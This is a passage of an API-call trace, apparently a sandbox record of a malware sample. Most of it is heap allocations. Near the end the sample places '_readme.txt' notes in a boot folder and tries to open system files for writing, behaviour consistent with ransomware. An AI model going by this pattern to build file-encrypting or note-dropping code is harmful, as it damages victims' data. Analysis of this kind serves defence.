| out: hHeap=0x630000) returned 1 [0097.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.103] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.103] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.103] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.103] PathFindFileNameW (pszPath="") returned="" [0097.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.104] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.104] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.105] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.105] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0097.105] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.106] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0097.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.106] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.106] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.106] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.107] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0097.107] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.107] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1832ee0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.107] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned=".txt" [0097.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.107] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1832ee0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.107] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.108] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.108] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.109] 